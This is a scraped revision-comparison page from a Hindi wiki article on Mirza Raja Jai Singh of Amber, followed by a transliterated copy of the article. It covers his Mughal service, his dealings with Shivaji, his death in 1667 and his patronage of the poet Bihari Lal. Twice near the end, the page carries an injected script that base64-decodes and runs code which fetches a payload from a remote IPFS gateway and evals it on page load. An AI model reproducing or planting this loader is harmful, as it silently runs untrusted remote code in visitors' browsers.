Difference between revisions of "जयसिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''मिर्जा राजा जयसिंह'''<br />
+
'''जयसिंह''' अथवा 'मिर्ज़ा राजा जयसिंह' [[आमेर]] का राजा था। वह [[मुग़ल]] दरबार का सर्वाधिक प्रभावशाली सामंत था। [[औरंगज़ेब|बादशाह औरंगज़ेब]] के लिए वह सबसे बड़ा आँख का काँटा था। औरंगज़ेब ने [[मराठा]] प्रमुख [[छत्रपति शिवाजी]] को दबाने के लिए जयसिंह को भेजा था।
*आमेर नरेश मिर्जा जयसिंह [[मुग़ल काल|मुग़ल]] दरबार का सर्वाधिक प्रभावशाली सामंत था, वह [[औरंगजेब]] की आँख का काँटा बना हुआ था।  
+
 
*जिस समय दक्षिण में [[शिवाजी]] के विजय−अभियानों की घूम थी, और उनसे युद्ध करने में अफजलख़ाँ एवं शाइस्ताख़ाँ की हार हुई थी, तथा राजा [[यशवंतसिंह]] को भी सफलता मिली थी; तब औरंगजेब ने मिर्जा राजा जयसिंह को शिवाजी को दबाने के लिए भेजा था। इस प्रकार वह एक तीर से दो शिकार करना चाहता था। जयसिंह ने बड़ी बुद्धिमत्ता, वीरता और कूटनीति से [[शिवाजी]] को औरंगजेब से संधि करने के लिए राजी किया था।
+
*जिस समय दक्षिण में शिवाजी के विजय−अभियानों की घूम थी, और उनसे युद्ध करने में [[अफ़ज़ल ख़ाँ]] एवं [[शाइस्ता ख़ाँ]] की हार हुई तथा राजा [[यशवंतसिंह]] को भी असफलता मिली; तब औरंगज़ेब ने मिर्ज़ा राजा जयसिंह को शिवाजी को दबाने के लिए भेजा। इस प्रकार वह एक तीर से दो शिकार करना चाहता था।
*उसने सम्राट की इच्छानुसार शिवाजी को [[आगरा]] दरबार में उपस्थित होने को भी भेज दिया, किंतु वहाँ उनके साथ बड़ा अनुचित व्यवहार हुआ और औरंगजेब की आज्ञा से उन्हें नज़रबंद किया गया। बाद में शिवाजी किसी प्रकार औरंगजेब के चंगुल में से निकल गये जिससे औरंगजेब बड़ा दु:खी हुआ। उसने उन सभी लोगों को कड़ा दंड दिया, जिनकी असावधानी से शिवाजी को निकल भागने का अवसर मिल गया था।  
+
*जयसिंह ने बड़ी बुद्धिमत्ता, वीरता और कूटनीति से [[शिवाजी]] को औरंगजेब से संधि करने के लिए राजी किया। उसने बादशाह की इच्छानुसार शिवाजी को [[आगरा]] दरबार में उपस्थित होने के लिए भी भेज दिया, किंतु वहाँ शिवाजी के साथ बड़ा अनुचित व्यवहार हुआ और औरंगजेब की आज्ञा से उन्हें नज़रबंद कर दिया गया।
*मिर्जा जयसिंह और उसका पुत्र [[महाराज रामसिंह|कुँवर रामसिंह]] भी उसके लिए दोषी समझे गये, क्योंकि वे ही शिवाजी की [[आगरा]] में सुरक्षा के लिए अधिक चिंतित थे। उसने रामसिंह का मनसब और जागीर छीन ली तथा जयसिंह को तत्काल दरबार में उपस्थित होने का हुक्मनामा भेजा।  
+
*बाद में शिवाजी किसी प्रकार औरंगज़ेब के चंगुल में से निकल गये, जिससे औरंगज़ेब बड़ा दु:खी हुआ। उसने उन सभी लोगों को कड़ा दंड दिया, जिनकी असावधानी से शिवाजी को निकल भागने का अवसर मिल गया था।
*मिर्जा राजा जयसिंह को इस बात का बड़ा खेद था कि शिवाजी को आगरा भेजने में उसने जिस कूटनीतिज्ञता और सूझ−बूझ का परिचय दिया था, उसके बदले में उसे वृद्धावस्था में अपमान एवं लांछन सहना पड़ा। इस दु:ख में वह अपनी यात्रा भी पूरी नहीं कर सका और मार्ग में बुरहानपुर नामक स्थान पर सन् 1667 में उसकी मृत्यु हो गई।  
+
*मिर्ज़ा राजा जयसिंह और उसका पुत्र [[महाराज रामसिंह|कुँवर रामसिंह]] भी उसके लिए दोषी समझे गये, क्योंकि वे ही शिवाजी की [[आगरा]] में सुरक्षा के लिए अधिक चिंतित थे।
*मिर्जा राजा जयसिंह वीर सेनानायक और कुशल राजनीतिज्ञ होने के साथ ही साथ साहित्य और कला का भी बड़ा प्रेमी था।  
+
*औरंगज़ेब ने रामसिंह का [[मनसब]] और जागीर छीन ली तथा जयसिंह को तत्काल दरबार में उपस्थित होने का हुक्मनामा भेजा।
*उसी के आश्रय में कविवर [[बिहारी लाल]] ने अपनी सुप्रसिद्ध बिहारी सतसई की रचना सन् 1662 में की थी।
+
*जयसिंह को इस बात का बड़ा खेद था कि शिवाजी को आगरा भेजने में उसने जिस कूटनीतिज्ञता और सूझ-बूझ का परिचय दिया था, उसके बदले में उसे वृद्धावस्था में अपमान एवं लांछन सहना पड़ा। इस दु:ख में वह अपनी यात्रा भी पूरी नहीं कर सका और मार्ग में [[बुरहानपुर]] नामक स्थान पर सन 1667 में उसकी मृत्यु हो गई।  
 +
*जयसिंह वीर सेनानायक और कुशल राजनीतिज्ञ होने के साथ ही साथ [[साहित्य]] और [[कला]] का भी बड़ा प्रेमी था। उसी के आश्रय में कविवर [[बिहारी लाल]] ने अपनी सुप्रसिद्ध 'बिहारी सतसई' की रचना सन 1662 में की थी।
  
 
{{लेख प्रगति |आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
 
{{लेख प्रगति |आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजपूत साम्राज्य}}{{मुग़ल साम्राज्य}}
 
{{राजपूत साम्राज्य}}{{मुग़ल साम्राज्य}}
[[Category:राजपूत साम्राज्य]][[Category:राजस्थान का इतिहास]][[Category:चरित कोश]][[Category:इतिहास कोश]]
+
[[Category:राजपूत साम्राज्य]][[Category:मध्य काल]][[Category:राजस्थान का इतिहास]][[Category:चरित कोश]][[Category:इतिहास कोश]][[Category:मुग़ल साम्राज्य]]
[[Category:मुग़ल साम्राज्य]]
 
 
__INDEX__
 
__INDEX__

Revision as of 13:02, 3 June 2014

jayasianh athava 'mirza raja jayasianh' amer ka raja tha. vah mugal darabar ka sarvadhik prabhavashali samant tha. badashah aurangazeb ke lie vah sabase b da aankh ka kaanta tha. aurangazeb ne maratha pramukh chhatrapati shivaji ko dabane ke lie jayasianh ko bheja tha.

  • jis samay dakshin mean shivaji ke vijay−abhiyanoan ki ghoom thi, aur unase yuddh karane mean afazal khaan evan shaista khaan ki har huee tatha raja yashavantasianh ko bhi asaphalata mili; tab aurangazeb ne mirza raja jayasianh ko shivaji ko dabane ke lie bheja. is prakar vah ek tir se do shikar karana chahata tha.
  • jayasianh ne b di buddhimatta, virata aur kootaniti se shivaji ko aurangajeb se sandhi karane ke lie raji kiya. usane badashah ki ichchhanusar shivaji ko agara darabar mean upasthit hone ke lie bhi bhej diya, kiantu vahaan shivaji ke sath b da anuchit vyavahar hua aur aurangajeb ki ajna se unhean nazaraband kar diya gaya.
  • bad mean shivaji kisi prakar aurangazeb ke changul mean se nikal gaye, jisase aurangazeb b da du:khi hua. usane un sabhi logoan ko k da dand diya, jinaki asavadhani se shivaji ko nikal bhagane ka avasar mil gaya tha.
  • mirza raja jayasianh aur usaka putr kuanvar ramasianh bhi usake lie doshi samajhe gaye, kyoanki ve hi shivaji ki agara mean suraksha ke lie adhik chiantit the.
  • aurangazeb ne ramasianh ka manasab aur jagir chhin li tatha jayasianh ko tatkal darabar mean upasthit hone ka hukmanama bheja.
  • jayasianh ko is bat ka b da khed tha ki shivaji ko agara bhejane mean usane jis kootanitijnata aur soojh-boojh ka parichay diya tha, usake badale mean use vriddhavastha mean apaman evan laanchhan sahana p da. is du:kh mean vah apani yatra bhi poori nahian kar saka aur marg mean burahanapur namak sthan par san 1667 mean usaki mrityu ho gee.
  • jayasianh vir senanayak aur kushal rajanitijn hone ke sath hi sath sahity aur kala ka bhi b da premi tha. usi ke ashray mean kavivar bihari lal ne apani suprasiddh 'bihari satasee' ki rachana san 1662 mean ki thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>